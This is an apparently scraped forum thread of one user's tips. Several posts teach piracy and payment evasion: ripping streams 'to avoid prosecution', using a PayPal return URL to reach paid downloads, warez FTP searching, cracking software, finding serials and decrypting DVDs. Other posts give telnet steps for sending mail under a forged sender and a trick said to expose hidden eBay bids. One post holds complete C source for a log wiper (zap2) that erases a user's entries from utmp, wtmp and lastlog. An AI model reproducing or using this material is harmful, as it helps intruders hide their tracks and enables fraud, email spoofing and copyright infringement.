First of all, you need to find a good site that hosts streaming audio. My favorite that has brought me many songs to date is hxxp://Only the registered members can see the link . Some others are just as good, but this is the site that I will be referencing (plus, I know you guys love to steal from Microsoft).

Step 2:
Alright, go up to the left hand corner where there is an empty text box. This is the search box, just fill it with a songname or artist just like you would in kazaa and click search. This will bring up a page with links to many websites hosting a stream by that artist. The ones with music notes are just that...music, this is what you want. In many cases, this is all you need. Just right click on one of the links and click "save as" to save the song. This works if the file extension is .mp3 or .wma or .asf or well-other known formats. If this worked, you are finished, otherwise continue reading.

Step 3:
However, if you encounter a .asx file, there are a few more steps you will have to endure. First of all, do exactly like the above example and save the file locally. After the file is downloaded, check to see how large the file is. If it is a large file in the megabyte range, then you should be able to play it in your favorite music program. However, if it is less than 1 kilobyte, open it as a textfile. You will then see many script commands that communicate to windows media player. Don't worry about these, just look for some URLs which will most likely be pointing to a .asf file. It will have at least one if not more. Open the new found URL in your browser and save it like in step 2 and you should be good to go. (I use Mozilla, because Internet Explorer likes to open things rather than save them as I tell it)

NOTE: If any of the URLs are preceded with "mms://" instead of "Only the registered members can see the link" find another URL, because this technique will not work.

This technique is especially useful to avoid prosecution because streaming audio, and downloading it appear the same to a web server, therefore you are seen as just another "legal" listener, so "download" away my friend and don't blame me if this soon becomes illegal (if it isn't already).

Step 4:
If you are picky then search for a program that will convert these file types to mp3s. I assure you there are many sites out there.

If this technique does not work for some reason, there is another technique which is manually recording streaming audio, with an audio capture program. I use the one that came with my soundcard (Audigy 2ZS, great soundcard), but I would recommend it only as a last resort such as with "mms://" files. There is a degredation in quality compared to the other formats and it records every sound your PC makes while it is recording so don't chat on AIM while recording (lol I can hear random doors slamming now).

Master
29-04-07, 09:16
Just a little basic html tip for those who are trying to download an application from sites which has an paypal order page & link to start you off.

Use a proxy when you try this to hide your ip as some sites will record your ip when you connect for security.

1) Rightclick your mouse (ctrl+click) viewsource and open the source of the site in an a texteditor
2) Search for the word "return"
3) Next to it you can find the url for the thank you page
4) Copy the url and paste it in your browser and you will see the download link

This works only if you can download instantly after payment, it will not work if the link needs to be emailed to you.

You can try it here to start with:
Code:
Only the registered members can see the link


About half way down the page you will find:

<input type="hidden" name="return" value="Only the registered members can see the link ">

Copy the link into your browser and download.

Master
29-04-07, 09:16
Download From Ftpz, Using Ftp Search Sitez

Downloading From Ftpz & Using Ftp Search Sitez

A Tutorial By: DeadKid

Toolz Needed:
SmartFTP [ smartftp.com ]
NAPALM FTP Search Site [ search.ftphost.net ]
vcdquality.com Release Nfo Site
DAMN NFO Viewer or just notepad [Only the registered members can see the link ]

This tutorial is so i can stop answering tha same NewB questionz everyday
in this tutorial I'll xplain how to use search sites like NAPALM effectively.
basically better search results and a quality release.
we are gunna use a movie as tha example so here we go...
first thing I do is try and figure who all released it & if any were nuked and why
most of tha time you can find tha NFO at tha sites below
Only the registered members can see the link - Only the registered members can see the link - Only the registered members can see the link
we are gunna use vcdquality to find out NFO on Tomb Raider: The Cradle Of Life
h**p://Only the registered members can see the link
ok say you chose tha copy Centropy released
here is tha link to tha nfo file (( You May Wanna Get DAMN NFO Viewer B.T.W. ))
h**p://Only the registered members can see the link
if you read it you see a section that sayz Archives [56/56*15]
ok so now ya know your looking for 2 CD'z & that are Split Rar files @ 15mb each
also you will see this (( passwd is "drudgereportdotcom" )) im sure that will help later
so now to go find tha file names by do'n a search here are some sites you can use
NAPALM - RELIZ - AMUN - FTPSpider
im gunna use NAPALM for tha example do an un-filtered search for "tomb raider centropy" without tha quotes
but I wouldn't recommend alwayz searching as above b/c
tha Name of tha Movie/App/Game/ReleaseGroup isnt alwayz gunna be in file name or url
so results could be limited but it helps on getting correct file namez
you should notice the file name seems to be in this format ctp-tr1.r54 & ctp-tr2.r54
"ctp-tr1.r54" be'n a file from CD1 and "ctp-tr2.r54" be'n a file from CD2
ok so now we know tha file names, so search for ctp-tr2.r54 and you will have more streamline results
b4 we had over 100 results from each ftp that had this movie one result per file @ over 50 files per cd
that would take way to long to go through page by page till you get to each FTP site
but now that we have tha search narrowed down by a single file name each result is a different ftp site
notice also that I searched for a high # file from cd 2 the reason for this is b/c
it is more likely that it has been fully uploaded and not missing any files b/c most people start uploading
from cd1 and in order of first split file .rar .r00 .r01 NOT from cd2 and backwards .r50 .r49 .r48
ok that wuz ez enough but now we get to tha hopefully not slow part DOWNLOADING tha filez
normally you can get better speeds from an anonymous server b/c you can use multiple connections at once
say tha server only gives ya 4k down you may be able to connect 50 times at once and get more like 200k down
but a FTP tha needs a Password and user name normally isnt that EZ
reason why is normally only 1 connection per IP is allowed
and amount of users at one time is limited to about 15 or less
so alwayz long line of peepz waiting to get in
basically even if could have more than one connection per IP
if it took 9 hrz to get access you would need to wait that long for each connection or thread
by tha time another thread connected you would have prob already finished downloading tha file anyway
NAPALM search site has nice search filter/option that will only show anonymous serverz in the results page
now open up SmartFTP and there are a few options we wanna be sure and change
Tools > Settings > General::
Set Default Download Path to whatever you want
Tools > Settings > Connection ::
Set Max Retries to -1 (( -1 = unlimited ))
Set Retry Delay to @ least 40 sec.*
*(( b/c some ftp'z will ban if you hammer/try and login to often ))
*(( read welcome messages on tha ftp log/status window for possible hammer rulez ))
Tools > Settings > Connection > Keep Alive ::
Make sure Keepalive is checked
Set interval to about 40
(( if set to low will be anoying & to high may not be effective on some sitez ))
Highlight NOOP in tha list and push Remove
Now type LIST into tha box and push tha Add
(( This is the command that keepalive uses to pretend your not idle ))
(( some ftps will kick you out if you are idle to long ))
(( and some still do with tha NOOP command we so have changed it to LIST
(( if you want you can change it to something better all i know is this works for me ))
(( nobody wants to sit 9hrz waiting to get in then get kicked out ))

SmartFTP also has Clipboard monitoring so all you need to do is have smart ftp open/running
go Back to NAPALM right click a link and select "Copy Shortcut" from tha menu and smartFtp will
popup and say FTP URL in clipboard detected if you wanna open that site Just cick yes EZ enough i think
but it can be even more simple than that if you want...

Tools > Settings > Display > Prompts ::
Uncheck: On URL Catch
(( Now it will just open tha FTP without any prompt ))

When you are conecting to ftpz you need to watch tha log/status window
For possibe crap links (( dead links and/or ratio sites ))
These are tha most common errorz to look for:

530 Account Disabled.

No connection could be made because the target machine actively refused it.

A connection attempt failed because the connected party did not properly respond after a period of time,
or established connection failed because connected host has failed to respond.

550 Permission denied. - while try'n to download a file
(( this is probably a ratio site if it has everything you ever wanted and more & looks to good to be true ))
(( it probably is and id just move on to tha next site ))

Another problem you may find on anonymous ftpz is that tha filez or folders are not there
2 reasonz for that is they were either deleted or just moved
if they were moved this could be a problem most people uploading to anonymous ftpz
make a huge maze of locked folders to hide their filez and that makes for an endless task
tryn to find the filez unless you have an app that can spider the ftp
and has tha capability to get through locked folders if so then should take only a few min
to have a list of every file on the ftp I dont know of any public app i can recommend with that capability
but they do exist... this app can get through locked folders and may kinda help seemz like a crap program
but best i could find on google in about 5 min worth of searching
PubView.zip - Only the registered members can see the link has nfo about dir locking & breaking dirs

K now ill go over some basic instructions on downloading from Anonymous and NonAnonymous Sitez
or maybe i should say sites That allow more than one connection per IP and ones that Dont
we will start with anonymous or multiple thread capable FTPz
once you have tha ftp open and you see tha files you want just drag and drop them into
the Global Queue tab on tha transfers window and then just push the start button
should have tha in speed @ bottom right status bar if its not going fast enough
you can adjust tha amount of connections/threads you have running
keep adding threads until your bandwidth is maxed or until your total In speed doesnt get any faster
another thing you may wanna keep in mind is that you can connect to more than one ftp
downloading CD1 from one site and CD2 from the other etc. for a combined speed
now we go onto NonAnonymous Sitez.... You cant use Global Queue b/c you cant have multiple threads
so just right click tha file or folder you want and select Download > Direct > Select Folder
most of these sites will be slow and could take hrz maybe dayz to get into
so what i do is just open every single result in NAPALM at tha same time
I figure i have a better chance waiting on 10 sitez then 1
so when you have them all open just close out tha ones that have tha errors mentioned above
then you can walk away and check every so often to see if you have gotten in one yet
this is where tha keepalive option helps out and of course if you happen to get into more than one @ a time
just go for tha combined speed method if going slow

thats about it, all simple stuff but seems to be tha best process i have found
hope this helpz happy hunting

Master
29-04-07, 09:17
Download Mp3's Without Using Filesharing

Only the registered members can see the link
Only the registered members can see the link]Only the registered members can see the link
Only the registered members can see the link]Only the registered members can see the link
Only the registered members can see the link]Only the registered members can see the link
Only the registered members can see the link]Only the registered members can see the link
Only the registered members can see the link]Only the registered members can see the link

This is the one wot i use to download MP3's
Only the registered members can see the link

Master
29-04-07, 09:18
Heres a simple trick i discovered while using media player

Find a site that lets you play music or videos using media player
e.g. ringtones/mp3 and so on.

when media player loads and is playing your music/video click File then Save Media As..

select a place to save to and rename file if you wish but dont change File Type
leave it as Internet Cache then click save.

your music/video will then download quicker than normal download speed and you will then have your file in the location you set.

BUT this won't work with every site so dont panic just try another

It has worked for me on several sites that allow you to listen to music or watch videos online

Master
29-04-07, 09:18
SIZE~speed<>28.8k mad.gif <<<<>56K disgust.gif <<<<>T1 good.gif
500K<<<<<<4 minutes<<<2 minutes<<<<1 minute
1 MB<<<<<<7 minutes<<<4 minutes<<<<1 minute
5 MB<<<<<37 minutes<<<22 minutes<<<1 minute
20 MB<<<<148 minutes<<89 minutes<<<<2 minutes
50 MB<<<<370 minutes<<222 minutes<<<4 minutes
100 MB<<<<741 minutes<<444 minutes<<9 minutes

Master
29-04-07, 09:19
0x01.0 - the start...


So, you've just got a brand new internet connection thingie installed and it can handle up to 1 meg/sec download. But offcourse, no good PC without good software, but you know, good software is very expensive... And on a beautifull sunday morning you see something called Warez. Behold our kingdom and you start drewling a bit untill ur mom comes raging in your room asking for you to put the garbage out. After helping your mom out, the PC and fast inet connection is all yours... And so is the free software.


0x02.0 - packaged files.


As you might know, these software packages are sometimes pretty big in size. To try and reduce the big-file-downloads, the releasers of the package will often use some techniques to reduce the load. Techniques as compressing, archiving and splitting. Read-on if you dont understand these words..


0x02.1 - formats & tools.


If you've been around more than 1 year on the net, you prolly allready know all this but for the knew people I added this anyways...
The basic use of your Windows Operating System is the use of many different files and file-types. One of the most used file-types on the net is ZIP. File-types are also called 'formats'.
An overview:

ZIP A zipped file is a file thats been archived and compressed.
RAR RAR files are commonly used for archiving files; which is putting a large number of files in one file. Compressing is optional. File-splitting is optional.
ACE About the same as a RAR file, just an other format and another application.

I explain this to you because these file-types and coresponding programs are often, you can even use always here, used when you want to download Warez. The programs you download are almost always archived, compressed or bundled in one of the above formats. Keep reading if you didnt knew this

Ok so, now we know the formats of the files were gonna deal with, now the programs.
As you prolly figured out allready, these files arent created by Windows or by hand. Theyre made using specialy designed applications. Ill show you what applications you can use.

WinRAR : My personal favorite. Handles all of the above stated formats and alot, alot more. If you ask for my opinion, I think this is the only program you'll ever need.

WinZIP : This is a specially designed application for handleing ZIPPED files. If you like this one, take it.

WinACE : Another multi-file handling tool. Personal opinion: good for splitting files, way too big for every-day use for decompression.

I'd say: make your choice. I recommend WinRAR because of it's simplicity and effectiveness. But hey, I'm not forcing you. Just read some info on the sites and make ur choice.

Oh yea, one last thing: you'll notice these are all Evaluation versions. I suggest you crack them. Look for a good crack for the right version on: Only the registered members can see the link


0x02.2 - multi-part archives.


? These files are archived in multiple parts (with one of the applicatiosn mentioned above). Which means the software was zipped or rarred and divided into files of a smaller size then the whole thing together. How do you handle this?

>>> Download all the files to one directory.

>>> Check if all files are there. You can do this by looking at the extensions: *.00, *.01, ... If one's missing, download the missing file again (there are more sofisticated ways to do this but this is the simplest).

>>> Check if the files are about the same size. For example: the *.04 file must be the same size as the *.05 file, unless the 5th file is the last one.

>>> If theres a file with the extension *.RAR, double click it and u can start unpacking the stuff.

>>> If theres no *.RAR, but an *.ACE, do the same, its just an other format.

>>> Once you unarchived the package, you should have a directory full of files from an instalation or program. But its also possible there are, with the archived files, some other things:

- If the software pack is a Warez Group (MYTH, CLASS, Fairlight (FLT), ...) release, check if there's an EXE file with the package called Install.exe. If it's there, you can use that to unpack the files.

- If there's no exe in the package, the files are prolly just ready to be copied to your directory of choice // or ready to be installed.

IMPORTANT : please dont forget to read the NFO file. Its very important. It usually contains all further information needed for you to successfully install the software. You can open it with NFO-file viewers or in Notepad (set font to: terminal, 6 or 9 pts).

Normally, you're all done now and ready to start using the software.


? Ok, do I hear protest? Yes I do. It goes: "Hell, I downloaded a multi-part package but it has NO RAR OR ACE OR ZIP OR ANYTHING!!!! Just files with extensions called *.001; *.002, ..."

Your right. Although the situation is quite different from the situation above, it's really not so different when you look closer. Those files are just unarchived the same way:

>>> Select the first file (*.001).

>>> Right-click it and select 'Extract here...'

Watch the progress bar go! You see, its just the same method. You might notice theres only 2 or 3 files decompressed: ISO or CUE and BIN files. Thats fairly normal. Well talk about handling them in topic 0x03.0...


0x02.3 - one-file downloads.


Ok so the stuff u downloaded was none of above. Conclusion: you downloaded one big file. This happens quite often when you download things from fast-working FTPs.
What you need to do now:

>>> If the file is archived (.rar, .ace, .zip, ...), just unarchive it.

>>> If the file u unrachived is some weird *.ISO or *.CUE file, go to 0x03.0.

>>> If not, just continue the procedure as stated in 0x02.2.



0x03.0 - a clear view on images.


So when youre reading this, u prolly have some files called *.ISO or *.CUE. Offcourse you want to install the software as fast as possible. But, theres a little problem here. Those extensions... What the hell are they... Alienized files? No. Secret CIA files? Nope. You can stop guessing. Ill tell you: those files are image files.


0x03.1 - what are images?


Image files are big files filled with data. Yea, you can say its a sort of archived file. But theres something special about them: they are meant to written on a disc. They were made by special programs so they could be used to write on a CD-R with a writer and specially designed software.


0x03.2 - ISO files.


ISO is the most used image-format on the net. It has become a standard to any commercial cd-writing software to support image-writing capabilities, more specific ISO images.
Conclusion: ISO is just an extension for a specific type of image -file. But how do you install your software? You have 2 ways of dealing with this:
1) Use the file for what is was created: writing it to a CD-R.
2) Extracting the contents of an ISO to a certain directory.

First: how to write them to a CD-R...

>>> Download some CD-R writing software (if you dont have it allready).

>>> Install and crack it.

I recommend Nero Burning Rom. You can download it from WareZone in the Apps section.

>>> Go buy some CD-R's

>>> Fire-up Nero and you can start burning. Im not going to explain you how to use Nero. Read the help file about image writing and you should be fine. You can also use the wizard which is loaded automatically when you boot Nero.

Second: what to do if you dont got a CD-writer....

>>> Download some Image handling software.

I recommend WinISO.

>>> Fire-up WinISO, load your image file and extract it. Again I wont explain how to use WinISO. Check for help files or tutorials on the net, they should give you all the answers you need.


0x03.3 - CUE & BIN files.


CUE and BIN files always come together. The BIN file is comparable with an ISO and the CUE file is just a check, but it is required for any program to write this file correctly. Sometimes, theres an SFV file included. Again this is just a check-up about the file integrity.
You can burn and extract these files the same way i explained in 0x03.2.

0x04.0 - CD Emulation.


Ok, so here's another way to handle ISO images if you don't have a cd-writer.
You can create a virtual cd drive. What's that? That's something you'll see as a new disk drive in your Windows Explorer. This disk drive represents the contents you would see if you would burn the ISO image to cd!
How to create a virtual cd drive? Download DaemonTools !
Additional help on Only the registered members can see the link

Master
29-04-07, 09:19
Downloading Windows Media Streams

Look for the video source url in the webpage source code and copy it:
user posted image
To view the source code, r-click on the webpage that plays the video and select "view source." If unable to do so, just close the window and in the main Internet Explorer (IE) window, click the History icon or press Ctrl+H. Look for the same webpage on the left pane. On the menu, click View > View source.

Paste the video source url in Windows Media Player. (File > Open URL... )
Let the video play now. When the correct title appears on the playlist pane, r-click on it and select "Properties."
Select the source url and copy it:
user posted image

tongue.gif Paste this url in Flashget to download the video clip.

Master
29-04-07, 09:19
Ok, this should work...First of all, there is one great extension for DW & PHP ADODB object model that is free and great! Download it and install from Only the registered members can see the link its called PHAKT (NOT impakt, because its not free)
Install it and you will have another type of PHP ADODB document type
Start project with PHP ADODB (not old PHP MySQL)
Page 1
Create form that has one Editbox and one button.
Name Edit box smething like e.g. "search" without quotes.
That form should have form action="results.php" and type set to POST
Not, create Page 2 and name it results.php. Create new recordset in dw
like this
SELECT *
FROM table
WHERE table.colum.you.r.searching LIKE '%colname%' OR table.other.column LIKE '%colname%' ORDER BY table.tableid
this means that we want to select ALL (*) records in table WHERE content of column is similar (Dav, will return Dave, David, Davidof...) to search keyword.
Next, in variables click + and add variable name colname default value set to % if you want to show all records if form is submited blank, or -1 if You want to show none if form is submited blank. Finaly for Run-time value type $Only the registered members can see the link['search'] Runtime value is equal name of Edit box name you set up in first page...
Now, from bindings tab, select values and insert it on page, that You would like to show on page. Ill skip this part assuming You know how to format output and how to limit it but if you dont know ask in reply...
So now You have page with results. Test it and see if its working.
If it is, create page 3 and name it details.php. Now, select value from page that you want to link with details page and click on link. Select details.php page and click on parameters. For param name enter something like id since this should be PK in table and unique value, and for value click on lightning icon, and select primary key in your table. In live page link should be like details.php?id=<some_value>.
As for details page recordset it should look like
SELECT *
FROM table
WHERE table.id = 'colname'
create vars as for page 2, but change Runtime to $Only the registered members can see the link['id']
and format output on page. That should be it, but since im typing it in "realtime" maby i forgot something...
Home I did helped You

Master
29-04-07, 09:20
NBC News Story
Let's face it, finding the right device driver can be a tedious, time consuming, often impossible task! The Driver Guide was created to make finding driver updates a whole lot easier. With the help of thousands of our members, we have compiled a massive database archive of drivers and resources that is by far the largest and most comprehensive on the Web. Here is what The Driver Guide will do for you:

* Provides an easy step-by-step process for finding and installing drivers.
* Offers a huge searchable archive of over 100,000 driver files, manufacturer information, and links.
* Includes discussion boards that give members the opportunity to interact with others with their hardware type, and learn from their experiences (very useful!).
* Offers a drivers found area where members can upload new and hard to find drivers for others to download.
* Provides a driver request board where members can make requests for specific drivers.
* Includes resources for Windows, Mac, Unix/Linux, and other platforms.
* Provides links to helpful tutorials, valuable utilities, and other resources.
* Offers a great collection of old, out of date, and hard to find drivers.
* Membership is absolutely FREE! Members are given lifetime access to this site.
* Since opening in 1997, millions of people have joined The Driver Guide!



Only the registered members can see the link

username:drivers
password :all

Master
29-04-07, 09:20
Dual Boot After The Fact

I want to run both Windows 2000 Pro and Windows 98 SE on my computer. When I bought a new hard drive, I installed Windows 2000 on it first. But my subsequent research seems to indicate that I should have installed Windows 98 SE first and then Windows 2000 on a separate partition. How do I remove Windows 2000 from the drive so I can partition it and then install Windows 98 SE first and reinstall Windows 2000?



You don't have to remove Windows 2000. Start by installing Windows 98 SE in a different partition. When you're done, insert the Windows 2000 CD and reboot to start Windows 2000 setup. On the Welcome to Setup page, press R (for Repair). When you reach the Windows 2000 Repair Options page, press R again.

You'll then be prompted to select a repair option. Press M for Manual. Then press the Up Arrow until Verify Windows 2000 system files is highlighted; press Enter to clear this selection. Press the Down Arrow to select Continue (perform selected tasks), and then press Enter.

The system will ask whether you have an emergency repair disk. Press L, indicating it should Locate your existing installation. Once it does so, press Enter to complete the repairs. This will establish dual boot for you. (This procedure also works for Windows XP.)


*NOTE:

Don't know if this will also work for Linux. If anyone does try it, please let me know.

Master
29-04-07, 09:21
Dvd-9 -> Dvd+r Dl, Double Layer To Double Layer!, 1:1 copies

Remove all discs from drives.

Open DVD Decrypter.

From the 'Mode' menu, select 'ISO' -> 'Read'.

Put DVD-9 disc (Thats the film if you didn't guess) in drive.

Take note of the 'Destination' file name.

Click the big 'Decrypt' button.

Wait for it to read and write the image to your hard drive.

Take the DVD-9 disc (yep.. take the original film out) out of the drive.

From the 'Mode' menu, select 'ISO' -> 'Write'.

Put a blank double layer disc in your DVD Writer.

Click the little folder icon - 'Browse for source file' - and select the MDS file created for you as part of the steps above.

Click the big 'Write' button.

Finished!

Estimated time to read and burn 45 minutes. All copy protection is removed from the backup, and as you are writing to a dual layered disc there is no quality loss!!!

This process can be used to backup DVD5 disc's 1:1 and PS2 disc's.

Master
29-04-07, 09:21
Dvd Copying/ripping Definitions

Rip
To take off the audio or video from a CD or DVD. Often CD Audio is "ripped" to MP3 files or DVD video ripped to VOB files.

Compression
The process of removing redundancies in digital data to reduce the amount that must be stored or transmitted. Lossless compression removes only enough redundancy so that the original data can be recreated exactly as it was. Lossy compression sacrifices additional data to achieve greater compression.

Encoding
Encoding is the process of changing data from one form into another according to a set of rules specifiec by a codec. The data is usually a file containing audio, video or still image. Often the encoding is done to make a file compatible with specific hardware (such as a DVD Player) or to compress or reduce the space the data occupies.

Common video encoding methods are DivX, MPEG-1, MPEG-2 and MPEG-4. A common audio encoding method is MP3 although many others exist including MPEG1 audio, DTS, and Dolby Digital.

Transcoding
On this site generally another name for encoding.

A more technical term would be "The reformatting of content, without changing the source, to another type of content - most often of a different format than the original (but does not have to be)"

Master
29-04-07, 09:22
DVD Regions Information

The DVD region code identifies a DVD's compatibility with the players typically sold in a particular region.

The following graphic shows the approximate location of each region.

Image

Region 0 (or "region free") is compatible with DVD players from any region.

The majority of all current titles play only in one specific region unless otherwise noted. DVDs sold by Amazon.co.uk are encoded for Region 2 or Region 0. Region 2 DVDs may not work on DVD players in other countries.

Region 1 DVDs sold by Marketplace sellers

Region 1 discs are intended for use with standard DVD players in North America (Canada and the USA). In most instances they can also be played on compatible "multi-region" DVD players (also known as "chipped" or "region-free" players).

They also require an NTSC-compatible television. NTSC is the standard picture format in North America, and differs from the PAL format adopted in Britain and Europe. Region 1 DVDs are usually presented in NTSC format, so you should ensure that your TV is capable of reading the NTSC signal before purchasing Region 1 DVDs.

Regional Coding Enhancement (RCE)

Regional Coding Enhancement (RCE) has been added by some film studios (specifically Warner and Columbia) to selected Region 1 DVDs, with the intention of preventing these discs from playing on some multi-region DVD players. We are therefore unable to guarantee that all Region 1 discs will be compatible with all multi-region players.

Global DVD region countries

This is not a definitive list and is intended only as a guide.

Region 1 - US, US Territories and Canada

American Samoa, Canada, Guam, Palau, Mariana Islands, Marshall Islands, Puerto Rico, Micronesia, United States, U.S. Virgin Islands


Region 2 - UK, Europe, Japan, South Africa and Middle East

Albania, Andorra, Austria, Bahrain, Belgium, Bosnia and Herzegovina, Bulgaria, Croatia, Czech Republic, Denmark, Egypt, Finland, France, Germany, Gibraltar, Greece, Greenland, Hungary, Iceland, Iran, Iraq, Ireland, Israel, Italy, Japan, Jordan, Kuwait, Lebanon, Liechtenstein, Luxembourg, Macedonia, Malta, Moldova, Monaco, Netherlands, Norway, Oman, Poland, Portugal, Qatar, Romania, San Marino, Saudi Arabia, Slovakia, Slovenia, South Africa, Spain, Sweden, Switzerland, Syria, United Arab Emirates, United Kingdom, Vatican City, Yemen, Yugoslavia


Region 3 - Southeast and East Asia

Cambodia, Hong Kong, Indonesia, Laos, Malaysia, Myanmar, Phillipines, South Korea, Taiwan, Thailand, Vietnam


Region 4 - Australia, New Zealand, Central and South America

Antigua, Argentina, Aruba, Australia, Bahamas, Barbados, Barbuda, Belize, Bolivia, Brazil, Chile, Colombia, Costa Rica, Cuba, Dominica, Dominican Republic, Ecuador, El Salvador, Falkland Islands, French Guiana, Grenada, Guatemala, Guyana, Haiti, Honduras, Jamaica, Mexico, New Guinea, New Zealand, Nicaragua, Panama, Paraguay, Peru, Suriname, Trinidad, Tobago, Uruguay


Region 5 - Former Soviet Union, Indian sub-continent, Africa, North Korea and Mongolia

Afghanistan, Algeria, Angola, Bangladesh, Belarus, Benin, Botswana, Burkina Faso, Burundi, Cameroon, Cape Verde, Central African Republic, Chad, Comoros, Congo, Djibouti, Equatorial Guinea, Eritrea, Estonia, Ethiopia, Gabon, Gambia, Georgia, Ghana, Guinea, Guinea-Bissau, India, Ivory Coast, Kazakhstan, Kenya, Latvia, Lesotho, Liberia, Libya, Lithuania, Madagascar, Malawi, Mali, Mauritania, Mauritius, Mongolia, Morocco, Mozambique, Namibia, Niger, Nigeria, North Korea, Pakistan, Russia, Rwanda, Sao Tome and Principe, Senegal, Seychelles, Sierra Leone, Somalia, Sri Lanka, St. Helena, Sudan, Tanzania, Togo, Tunisia, Turkmenistan, Uganda, Ukraine, Uzbekistan, Zambia, Zimbabwe


Region 6 - China

China


Region 7 - Reserved for future use

Region 8 - International Territories (ships, planes, etc)

Master
29-04-07, 09:22
Easily Disconnect-reconnect From Broadband

it's pretty easy.. this is for ppl who dont know how to do this already..

makes it just as easy to disconnect and reconnect on broadband as it is on dialup.

simply open up network connections, and drag your connection to your quicklaunch / desktop wherever.

Master
29-04-07, 09:23
let's pretend you need a serial number for windows xp pro.

in the search bar type in just like this - "Windows XP Professional" 94FBR

the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' porn sites that trick you.

or if you want to find the serial for winzip 8.1 - "Winzip 8.1" 94FBR

just try it out, it's very quick and it works nicely..

-----------------------------------------------------------

here is another trick that works fairly decent for finding mp3's on the web (which is hard to do normally, to say the least)

say you want to get, for example, a Garth Brooks song. type this in the search bar - "index of/" "garth brooks" .mp3 the ones you want to check out first are the ones that say "Index of/" in the title of the search result. this technique allows you to easily pull up web folders with direct downloads. it will look the same as if you were logging into a ftp url.. i'm sure you can be pretty flexible on how you type that in, so long as you include "index of/"

i'm sure you can use this for more than just mp3's (it's not perfect but it has worked for me on a few occasions)

always make sure to use the quotations where i placed them. they help pinpoint the correct search results more accurately. just try it out, also if you want to learn how to do more with google look up "google hacks"

Master
29-04-07, 09:23
Just found this on the net, so I gave it a try.

Lo and behold, it actually works.

Very handy if you are an Ebayer.
Enjoy

When you look at an item and click on bid history all the bid amount are replaced with "-" until the end of the auction.

To view these amounts before the auction ends when viewing the item change


Only the registered members can see the link


in the address bar to


Only the registered members can see the link


And then click on the bid history. The bid amounts will be shown.

Master
29-04-07, 09:24
Eliminate Ie's Autocomplete Reminder

AutoComplete: Some people like it, some don't. Those who don't like it turn it off. Those of us who turned it off are now constantly being prompted to turn it on. By now, we despise it! How do we turn it off completely, with no more pop-ups asking us to turn it on?

It does seem that Internet Explorer really wants you to use AutoComplete. On a system with AutoComplete turned off, it will prompt you from time to time, asking to turn it on again. A Registry tweak will prevent IE's "helpful" reminders. First, close all IE windows. Launch REGEDIT from the Start menu's Run dialog. Navigate to the key HKEY_CURRENT_USER\Software\Policies\Microsoft\Inte rnet Explorer\Control Panel. Note that this key may not be present in its entirety. You may need to create the Internet Explorer and Control Panel subkeys. In the right-hand pane, look for a DWORD value named FormSuggest it will probably not be present. In that case, right-click in the right-hand pane and choose New | DWORD Value from the pop-up menu. Name the new value FormSuggest. Whether you found it or created it, double-click this value and set its data to 1. That should terminate the annoying reminder

Master
29-04-07, 09:24
1. Some ISP's block port 25 so it might not work
2. Most likely, you won't be able to see what yer typing

First of all, you need an SMTP server. These are extremely common and, in fact, I'll provide one for you (mail.hotmail.com). SMTP: Simple Mail Transfer Protocol. This service runs on port 25 (in most cases) and is used to send outgoing email.

Now, open up the command prompt and telnet to mail.hotmail.com on port 25 (note: to see what you type, type telnet and enter then type in set local_echo):



code:--------------------------------------------------------------------------------
telnet mail.hotmail.com 25
--------------------------------------------------------------------------------


When yer connected type in (except what's in between *'s; you chose what will go in the []):

code:--------------------------------------------------------------------------------
helo
*wait*
mail from:[whoever]@[whoever.com]
*wait*
rcpt to:[whoever]@[whoever.com]
*wait*
data
*wait*
[write]
[whatever you want]
[in]
[as many]
[lines as wished]
.
*wait*
quit
--------------------------------------------------------------------------------


Helo is just a handshake with the server. Mail from: is FROM who you want the email to be. rcpt to: is who you want the email to go to. under data is what you want sent. the '.' ends data. quit quits. There! simple isn't it.

Master
29-04-07, 09:25
Enable Folder and Icon Refresh

This reg file Enables Folder and Icon Refresh.


1. Copy the following (everything in the box) into notepdad.


QUOTE
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Advanced]
"NoNetCrawling"=dword:00000000




2. Save the file as disablerefreshundo.reg
3. Double click the file to import into your registry.

NOTE: If your anti-virus software warns you of a "malicious" script, this is normal if you have "Script Safe" or similar technology enabled.

Master
29-04-07, 09:25
¤¤ Erasing Your Presence From System Logs ¤¤



Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.



Example:



#include

#include

#include

#include

#include

#include

#include

#include

#define WTMP_NAME "/usr/adm/wtmp"

#define UTMP_NAME "/etc/utmp"

#define LASTLOG_NAME "/usr/adm/lastlog"



int f;



void kill_utmp(who)

char *who;

{

struct utmp utmp_ent;



if ((f=open(UTMP_NAME,O_RDWR))>=0) {

while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof( utmp_ent ));

lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);

write (f, &utmp_ent, sizeof (utmp_ent));

}

close(f);

}

}



void kill_wtmp(who)

char *who;

{

struct utmp utmp_ent;

long pos;



pos = 1L;

if ((f=open(WTMP_NAME,O_RDWR))>=0) {



while(pos != -1L) {

lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);

if (read (f, &utmp_ent, sizeof (struct utmp))<0) {

pos = -1L;

} else {

if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {

bzero((char *)&utmp_ent,sizeof(struct utmp ));

lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);

write (f, &utmp_ent, sizeof (utmp_ent));

pos = -1L;

} else pos += 1L;

}

}

close(f);

}

}



void kill_lastlog(who)

char *who;

{

struct passwd *pwd;

struct lastlog newll;



if ((pwd=getpwnam(who))!=NULL) {



if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {

lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);

bzero((char *)&newll,sizeof( newll ));

write(f, (char *)&newll, sizeof( newll ));

close(f);

}



} else printf("%s: ?\n",who);

}



main(argc,argv)

int argc;

char *argv[];

{

if (argc==2) {

kill_lastlog(argv[1]);

kill_wtmp(argv[1]);

kill_utmp(argv[1]);

printf("Zap2!\n");

} else

printf("Error.\n");

}

Master
29-04-07, 09:26
part 1


Like any other field in computer science, viruses have evolved -a great deal indeed- over the years. In the series of press releases which start today, we will look at the origins and evolution of malicious code since it first appeared up to the present.

